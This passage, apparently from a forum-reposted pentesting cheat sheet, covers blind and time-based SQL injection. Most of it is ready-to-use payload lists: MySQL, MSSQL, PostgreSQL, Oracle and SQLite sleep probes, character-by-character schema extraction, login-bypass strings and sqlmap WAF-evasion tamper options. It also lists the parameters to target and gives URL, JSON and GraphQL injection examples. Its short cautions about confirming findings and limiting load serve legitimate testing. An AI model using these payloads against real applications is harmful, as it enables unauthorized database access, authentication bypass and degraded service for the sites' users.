seconds)You must be logged in to see this link. IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=115) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=51) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=114) WAITFOR DELAY '00:00:5'-- (+5 seconds)Column Name = 117,115,51,114 = userPostgresql Blind SQLI(Stacked Queries):id=1; select pg_sleep(5);-- -1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(5) end;-- -
8. Blind SQL injection exploitation via sqlmap:
sqlmap -r req.txt -v 3 --time-sec=5 --technique=T --current-dbsqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=T --current-dbsqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=BT --current-db
9. Blind SQL injection WAF bypass (tamper):
Example:sqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=T --tamper=between --current-dbMysql,Mssql,Postgresql,Oracle (Blind):betweenMysql (Blind):ifnull2casewhenisnullifnull2ifisnullMysql,Mssql,Postgresql,Oracle (Blind):charencodeMysql,Mssql,Postgresql (Blind):charunicodeencodeMysql (Blind):commalesslimitcommalessmidMysql (Blind):escapequotesUTF-8 (Blind):apostrophemaskoverlongutf8overlongutf8moreBypass waf in JSON (Blind):charunicodeescapeMysql,Postgresql,Oracle (Blind):greatestCloudfare waf (Blind):xforwardedfor
And
Quick SQLMap Tamper Suggester:You must be logged in to see this link.
10. SQL detection payload (generic error):
'"'"./\%5c%27%22%23%3B)")')))"))'))#;''```,""//\\%%00||0.or-1%23'or-1%23#Detection source:["SQL syntax.*MySQL", "Warning.*mysql_.*", "valid MySQL result", "MySqlClient\."]["PostgreSQL.*ERROR", "Warning.*\Wpg_.*", "valid PostgreSQL result", "Npgsql\."]["Driver.* SQL[\-\_\ ]*Server", "OLE DB.* SQL Server", "(\W|\A)SQL Server.*Driver", "Warning.*mssql_.*", "(\W|\A)SQL Server.*[0-9a-fA-F]{8}", "(?s)Exception.*\WSystem\.Data\.SqlClient\.", "(?s)Exception.*\WRoadhouse\.Cms\."]["Microsoft Access Driver", "JET Database Engine", "Access Database Engine"]["\bORA-[0-9][0-9][0-9][0-9]", "Oracle error", "Oracle.*Driver", "Warning.*\Woci_.*", "Warning.*\Wora_.*"]["CLI Driver.*DB2", "DB2 SQL error", "\bdb2_\w+\("]["SQLite/JDBCDriver", "SQLite.Exception", "System.Data.SQLite.SQLiteException", "Warning.*sqlite_.*", "Warning.*SQLite3::", "\[SQLITE_ERROR\]"]["(?i)Warning.*sybase.*", "Sybase message", "Sybase.*Server message.*"]
11. SQL injection authentication bypass:
'=' 'or'' or ''='/1#\'-'' ''&''^''*'' or ''-'' or '' '' or ''&'' or ''^'' or ''*'"-"" ""&""^""*"" or ""-"" or "" "" or ""&"" or ""^"" or ""*"or true--" or true--' or true--") or true--') or true--admin' --admin' #admin'/*admin' or '1'='1admin' or '1'='1'--admin' or '1'='1'#admin'or 1=1 or ''='admin' or 1=1admin' or 1=1--admin' or 1=1#admin' or 1=1/*admin") or ("1"="1admin") or ("1"="1"--admin") or ("1"="1"#admin") or ("1"="1"/*admin") or "1"="1admin") or "1"="1"--admin") or "1"="1"#admin") or "1"="1"/*' or 'x'='x') or ('x')=('x')) or (('x'))=(('x" or "x"="x") or ("x")=("x")) or (("x"))=(("x1'or'1'='1or 1=1or 1=1--or 1=1#or 1=1/*admin' or '1'='1'/*admin') or ('1'='1admin') or ('1'='1'--admin') or ('1'='1'#admin') or ('1'='1'/*admin') or '1'='1admin') or '1'='1'--admin') or '1'='1'#admin') or '1'='1'/*admin" --admin" #admin"/*admin" or "1"="1admin" or "1"="1"--admin" or "1"="1"#admin" or "1"="1"/*admin"or 1=1 or ""="admin" or 1=1admin" or 1=1--admin" or 1=1#admin" or 1=1/*
- Time-based blind SQLi: Time-based SQL injection is an inferential SQL injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time indicates to the attacker whether the result of the query is TRUE or FALSE. Depending on the result, the HTTP response is returned with a delay or returned immediately. This allows an attacker to infer whether the payload evaluated to true or false, even though no data from the database is returned.
Time Based (GET,POST,PUT)
Apply on:
Search, first name, last name, number, any kind of date, email or password (register, login, reset password), any kind of product, menu, keyword, payment, Cookie, User-Agent, Referer, X-Forwarded-For
Parameter list (regular):
HTML:
idcidpidpagesearchusernamenameregisterfirst namelast nameemailpasspassworddircategoryclassregisterfilenewsitemmenulangnamereftitletimeviewtopicthreadtypedateformjoinmainnavregionselectreportroleupdatequeryusersortwhereparamsprocessrowtablefromresultssleepfetchorderkeywordcolumnfielddeletestringnumberfilter
Payload list:
MySQL Blind (Time Based):
0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Zif(now()=sysdate(),sleep(5),0)'XOR(if(now()=sysdate(),sleep(5),0))XOR''XOR(if(now()=sysdate(),sleep(5*1),0))OR'0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z0'or(now()=sysdate()&&SLEEP(1))or'Zif(now()=sysdate(),sleep(5),0)/"XOR(if(now()=sysdate(),sleep(5),0))OR"/if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"*/if(now()=sysdate(),sleep(5),0)/'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0) and 5=5)"/if(1=1,sleep(5),0)/*'XOR(if(1=1,sleep(5),0))OR'"XOR(if(1=1,sleep(5),0))OR"*/if(1337=1337,exp(~(1)),0)/*'XOR(if(1337=1337,exp(~(1)),0))OR'"XOR(if(1337=1337,sleep(5),0))OR"*/SLEEP(5)/*' or SLEEP(5) or '" or SLEEP(5) or "*/%2c(select%5*%5from%5(select(sleep(5)))a)(select(0)from(select(sleep(5)))v)(SELECT SLEEP(5))'%2b(select*from(select(sleep(5)))a)%2b'(select*from(select(sleep(5)))a)1'%2b(select*from(select(sleep(5)))a)%2b',(select * from (select(sleep(5)))a)desc%2c(select*from(select(sleep(5)))a)-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A))(SELECT * FROM (SELECT(SLEEP(5)))YYYY)(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#(SELECT * FROM (SELECT(SLEEP(5)))YYYY)--'+(select*from(select(sleep(5)))a)+'(select(0)from(select(sleep(5)))v)%2f'+(select(0)from(select(sleep(5)))v)+'"(select(0)from(select(sleep(5)))v)%2f*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*%2f(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*/',''),/*test*/%26%26%09sLeEp(5)%09--+AND BLIND:1 and sleep 5--1 and sleep 51 and sleep(5)--1 and sleep(5)' and sleep 5--' and sleep 5' and sleep 5 and '1'='1' and sleep(5) and '1'='1' and sleep(5)--' and sleep(5)' AnD SLEEP(5) ANd '1and sleep 5--and sleep 5and sleep(5)--and sleep(5)and SELECT SLEEP(5); #AnD SLEEP(5)AnD SLEEP(5)--AnD SLEEP(5)# and sleep 5-- and sleep 5 
and sleep(5)-- and sleep(5) and SELECT SLEEP(5); #' AND SLEEP(5)#" AND SLEEP(5)#') AND SLEEP(5)#OR BLINDr sleep 5--or sleep 5or sleep(5)--or sleep(5)or SELECT SLEEP(5); #or SLEEP(5)or SLEEP(5)#or SLEEP(5)--or SLEEP(5)="or SLEEP(5)=' or sleep 5-- or sleep 5 or sleep(5)-- or sleep(5) or SELECT SLEEP(5); #' OR SLEEP(5)#" OR SLEEP(5)#') OR SLEEP(5)#You can replace AND / OR1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=13371 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('PBiy'='PBiy) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((1337=1337))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((1337=13371 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)# 1337) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 13371 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))+)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND `1`=`1]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))|[1') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337'='1337'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337'='1337' AND (SELECT 
3122 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337') AND (SELECT 4796 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337' LIKE '1337'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337' LIKE '1337%' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337%'='1337' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337' LIKE '1337") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337"="1337")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337"="1337"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337"="1337" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337"="1337") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337" LIKE "1337")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337" LIKE "1337"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337" LIKE "1337" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337" LIKE "1337' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR '1337'='1337') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337") WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337RLIKE BLIND:You can replace AND / ORRLIKE SLEEP(5)--' RLIKE SLEEP(5)--' RLIKE SLEEP(5)-- 1337" RLIKE SLEEP(5)-- 1337') RLIKE SLEEP(5)-- 1337') RLIKE SLEEP(5) AND ('1337'='1337')) RLIKE SLEEP(5) AND (('1337'='1337'))) RLIKE SLEEP(5) AND ((('1337'='1337) RLIKE SLEEP(5)-- 1337) RLIKE SLEEP(5) AND (1337=1337)) RLIKE SLEEP(5) AND ((1337=1337))) RLIKE SLEEP(5) AND (((1337=13371 RLIKE SLEEP(5)1 RLIKE SLEEP(5)-- 13371 RLIKE SLEEP(5)# 1337) WHERE 1337=1337 RLIKE SLEEP(5)-- 13371 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(5))+)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337` WHERE 1337=1337 RLIKE SLEEP(5)-- 1337`) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337' RLIKE SLEEP(5) AND '1337'='1337') RLIKE SLEEP(5) AND ('1337' LIKE '1337')) RLIKE SLEEP(5) AND (('1337' 
LIKE '1337'))) RLIKE SLEEP(5) AND ((('1337' LIKE '1337%' RLIKE SLEEP(5) AND '1337%'='1337' RLIKE SLEEP(5) AND '1337' LIKE '1337") RLIKE SLEEP(5) AND ("1337"="1337")) RLIKE SLEEP(5) AND (("1337"="1337"))) RLIKE SLEEP(5) AND ((("1337"="1337" RLIKE SLEEP(5) AND "1337"="1337") RLIKE SLEEP(5) AND ("1337" LIKE "1337")) RLIKE SLEEP(5) AND (("1337" LIKE "1337"))) RLIKE SLEEP(5) AND ((("1337" LIKE "1337" RLIKE SLEEP(5) AND "1337" LIKE "1337' RLIKE SLEEP(5) OR '1337'='1337') WHERE 1337=1337 RLIKE SLEEP(5)-- 1337") WHERE 1337=1337 RLIKE SLEEP(5)-- 1337' WHERE 1337=1337 RLIKE SLEEP(5)-- 1337" WHERE 1337=1337 RLIKE SLEEP(5)-- 1337ELT Blind:You can replace AND / OR' AND ELT(1337=1337,SLEEP(5))--' AND ELT(1337=1337,SLEEP(5))-- 1337" AND ELT(1337=1337,SLEEP(5))-- 1337') AND ELT(1337=1337,SLEEP(5))-- 1337') AND ELT(1337=1337,SLEEP(5)) AND ('1337'='1337')) AND ELT(1337=1337,SLEEP(5)) AND (('1337'='1337'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337'='1337' AND ELT(1337=1337,SLEEP(5)) AND '1337'='1337') AND ELT(1337=1337,SLEEP(5)) AND ('1337' LIKE '1337')) AND ELT(1337=1337,SLEEP(5)) AND (('1337' LIKE '1337'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337' LIKE '1337) AND ELT(1337=1337,SLEEP(5))-- 1337) AND ELT(1337=1337,SLEEP(5)) AND (1337=1337)) AND ELT(1337=1337,SLEEP(5)) AND ((1337=1337))) AND ELT(1337=1337,SLEEP(5)) AND (((1337=13371 AND ELT(1337=1337,SLEEP(5))1 AND ELT(1337=1337,SLEEP(5))-- 13371 AND ELT(1337=1337,SLEEP(5))# 1337) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 13371 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 13371`=`1` AND ELT(1337=1337,SLEEP(5)) AND `1`=`1]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))|[1%' AND ELT(1337=1337,SLEEP(5)) AND '1337%'='1337' AND 
ELT(1337=1337,SLEEP(5)) AND '1337' LIKE '1337") AND ELT(1337=1337,SLEEP(5)) AND ("1337"="1337")) AND ELT(1337=1337,SLEEP(5)) AND (("1337"="1337"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337"="1337" AND ELT(1337=1337,SLEEP(5)) AND "1337"="1337") AND ELT(1337=1337,SLEEP(5)) AND ("1337" LIKE "1337")) AND ELT(1337=1337,SLEEP(5)) AND (("1337" LIKE "1337"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337" LIKE "1337" AND ELT(1337=1337,SLEEP(5)) AND "1337" LIKE "1337' AND ELT(1337=1337,SLEEP(5)) OR '1337'='FMTE') WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337' WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337" WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337'||(SELECT 0x4c454f67 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||''||(SELECT 0x727a5277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||''+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+'||(SELECT 0x57556971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+')) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337")) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337') AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337") AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337BENCHMARK:You can replace AND / OR' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337" AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337') AND =BENCHMARK(5000000,MD5(0x774c5341))--') AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337'='1337')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337'='1337'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337'='1337' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337'='1337') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337' LIKE '1337')) 
AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337' LIKE '1337'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337' LIKE '1337%' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337%'='1337' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337' LIKE '1337") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337"="1337")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337"="1337"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337"="1337" AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND "1337"="1337") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337" LIKE "1337")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337" LIKE "1337"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337" LIKE "1337" AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND "1337" LIKE "1337' AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND '1337'='1337
Microsoft SQL Server Blind (Time Based) — WAITFOR DELAY is a statement, not an expression, so unlike MySQL SLEEP() it cannot sit inside a WHERE condition; these payloads rely on the injected text being executed as an additional statement in the same T-SQL batch (the `;` / `--` variants below), which most SQL Server client drivers allow:
;waitfor delay '0:0:5'--';WAITFOR DELAY '0:0:5'--);waitfor delay '0:0:5'--';waitfor delay '0:0:5'--";waitfor delay '0:0:5'--');waitfor delay '0:0:5'--");waitfor delay '0:0:5'--));waitfor delay '0:0:5'--'));waitfor delay '0:0:5'--"));waitfor delay '0:0:5'--") IF (1=1) WAITFOR DELAY '0:0:5'--';%5waitfor%5delay%5'0:0:5'%5--%5' WAITFOR DELAY '0:0:5'--' WAITFOR DELAY '0:0:5'or WAITFOR DELAY '0:0:5'--or WAITFOR DELAY '0:0:5'and WAITFOR DELAY '0:0:5'--and WAITFOR DELAY '0:0:5'WAITFOR DELAY '0:0:5';WAITFOR DELAY '0:0:5'--;WAITFOR DELAY '0:0:5'1 WAITFOR DELAY '0:0:5'--1 WAITFOR DELAY '0:0:5'1 WAITFOR DELAY '0:0:5'-- 13371' WAITFOR DELAY '0:0:5' AND '1337'='13371') WAITFOR DELAY '0:0:5' AND ('1337'='13371) WAITFOR DELAY '0:0:5' AND (1337=1337') WAITFOR DELAY '0:0:5'--" WAITFOR DELAY '0:0:5'--')) WAITFOR DELAY '0:0:5'--'))) WAITFOR DELAY '0:0:5'--%' WAITFOR DELAY '0:0:5'--") WAITFOR DELAY '0:0:5'--")) WAITFOR DELAY '0:0:5'--"))) WAITFOR DELAY '0:0:5'--
PostgreSQL Blind (Time Based) — PostgreSQL has no `#` line comment (only `--` and `/* */`), so the `#`-terminated variants below do not truncate the rest of the query; pg_sleep() has to be called in a valid query context such as `(SELECT pg_sleep(5))` or `AND 1337=(SELECT 1337 FROM pg_sleep(5))`, and the `;SELECT pg_sleep(5);` forms are stacked queries that need a driver/API allowing multiple statements per call:
";SELECT pg_sleep(5);;SELECT pg_sleep(5);and SELECT pg_sleep(5);1 SELECT pg_sleep(5);or SELECT pg_sleep(5);(SELECT pg_sleep(5))pg_sleep(5)--1 or pg_sleep(5)--" or pg_sleep(5)--' or pg_sleep(5)--1) or pg_sleep(5)--") or pg_sleep(5)--') or pg_sleep(5)--1)) or pg_sleep(5)--")) or pg_sleep(5)--')) or pg_sleep(5)--pg_SLEEP(5)pg_SLEEP(5)--pg_SLEEP(5)#or pg_SLEEP(5)or pg_SLEEP(5)--or pg_SLEEP(5)#' SELECT pg_sleep(5);or SELECT pg_sleep(5);' SELECT pg_sleep(5);1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))-- 13371' AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND '1337'='13371') AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND ('1337'='13371) AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND (1337=1337
Oracle Blind (Time Based) — DBMS_PIPE.RECEIVE_MESSAGE blocks for the timeout (5 seconds here) waiting on a pipe that never receives a message; the first argument is only an arbitrary pipe name (CHR(118)||CHR(71)||CHR(73)||CHR(86) = 'vGIV'). The database user needs EXECUTE on DBMS_PIPE, which is typically granted to PUBLIC by default but is often revoked on hardened installs, in which case these payloads produce no delay even when the injection exists:
You can replace AND / OR
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)-- 1337' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND '1337'='1337') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND ('1337'='1337) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND (1337=1337
Generic Time Based SQL Injection Payloads (note: the BENCHMARK() payloads are MySQL-specific and CPU-bound, and the RANDOMBLOB()/HEX() payloads are the SQLite heavy-query equivalent, since SQLite has no sleep function — both burn real CPU/memory on the target rather than just parking one connection, so prefer sleep-based payloads where the backend supports them):
sleep(5)#(sleep 5)--(sleep 5)(sleep(5))--(sleep(5))-sleep(5)SLEEP(5)#SLEEP(5)--SLEEP(5)="SLEEP(5)='";sleep 5--";sleep 5";sleep(5)--";sleep(5)";SELECT SLEEP(5); #1 SELECT SLEEP(5); #+ SLEEP(5) + '&&SLEEP(5)&&SLEEP(5)--&&SLEEP(5)#;sleep 5--;sleep 5;sleep(5)--;sleep(5);SELECT SLEEP(5); #'&&SLEEP(5)&&'1' SELECT SLEEP(5); #benchmark(50000000,MD5(1))benchmark(50000000,MD5(1))--benchmark(50000000,MD5(1))#or benchmark(50000000,MD5(1))or benchmark(50000000,MD5(1))--or benchmark(50000000,MD5(1))#ORDER BY SLEEP(5)ORDER BY SLEEP(5)--ORDER BY SLEEP(5)#AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337RANDOMBLOB(500000000/2)AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))RANDOMBLOB(1000000000/2)AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
If the response is delayed by roughly the requested time (about 5 to 7 seconds for a 5-second sleep), the parameter is likely injectable — but confirm before reporting: re-send with the delay removed or the condition made false (e.g. `if(1=2,sleep(5),0)`) and check that the delay disappears, then change the sleep value (e.g. 10 seconds) and check that the delay scales with it. A single slow response can also be network latency, a WAF tar-pit, or a busy backend. Keep delays short and repeat sparingly: every confirmed sleep holds a database connection for that long, and the BENCHMARK/RANDOMBLOB heavy-query variants can degrade the service for real users.
Detection and exploitation:
1. Replace the parameter value with the payload: parameter=payload
Example:
parameter=0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
parameter=(select(0)from(select(sleep(5)))v)
email=test@gmail.com' WAITFOR DELAY '0:0:5'--
email=test@gmail.com'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
2. Keep the original value and append the payload to it: parameter=value payload
Example:
parameter=1 AND (SELECT * FROM (SELECT(SLEEP(5)))YYYY) AND '%'='
parameter=1'XOR(if(now()=sysdate(),sleep(5),0))OR'
parameter=1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
parameter=1 or sleep(5)#
Mysql blind sql injection (time based):
email=test@gmail.com'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
[IMG]https://miro.medium.com/v2/resize:fit:700/1*D9i4iyfJ62mnQeOtPfsAWg.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*EwylY6hqMBpTJXRq8BLgTA.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:392/1*UWGw-50xZC3wRYg_dklGPA.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*S4Bb8Nleps-hoSUdu9w5oA.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*PCaJrmljJDXWdIqU3GA9FQ.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*urhLRTDBPrpdukkcaelt2Q.jpeg[/IMG]
MSSQL blind Sql injection (time based):
email=test@gmail.com' WAITFOR DELAY '0:0:5'--
[IMG]https://miro.medium.com/v2/resize:fit:700/1*CdNLKLDfXfpECqwOr6Ecfg.png[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*cErDfVAS9BHyLBOIOzav2Q.png[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*XinsHBIpDcqZ6xj6HC1-Bg.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*-S9Is3nbZTUkri6wR588kQ.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*JRRt82kcpPa1vXP8zMdpGw.jpeg[/IMG]
3. Path (URL segment) injection: https://redact.com/page/payload or https://redact.com/page/value payload
Example:
https://redact.com/page"XOR(if(now()=sysdate(),sleep(3),0))OR"/
https://redact.com/(select(0)from(select(sleep(5)))v)%2f'+(select(0)from(select(sleep(5)))v)+'"
https://redact.com/page AnD SLEEP(5)
https://redact.com/page' ORDER BY SLEEP(5)
[IMG]https://miro.medium.com/v2/resize:fit:700/1*MX6EySiEHrusRBDdBk2NMA.jpeg[/IMG]
4. Blind SQL injection in JSON bodies (the payload goes inside the JSON value; escape any `"` as `\"` and keep the document valid JSON, otherwise the request is rejected by the parser before it ever reaches the database):
{payload}
[payload]
{value payload}
Example:
[-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))]
{AnD SLEEP(5)}
{1 AnD SLEEP(5)}
{1' AnD SLEEP(5)--}
{sleep 5}
"emails":["AnD SLEEP(5)"]
"emails":["test@gmail.com' OR SLEEP(5)#"]
{"options":{"id":[],"emails":["AnD SLEEP(5)"],
5. Blind SQL injection in GraphQL (the payload goes into the `sortc` variable — a sort-column name, which cannot be bound as a query parameter if it ends up in an ORDER BY, making it a typical injection point; note the template's selection uses `$sortColumn`/`$sortReverse` while declaring `$sortc`/`$sortrev`, which a strict GraphQL validator would reject, so align the variable names with the target's real schema):
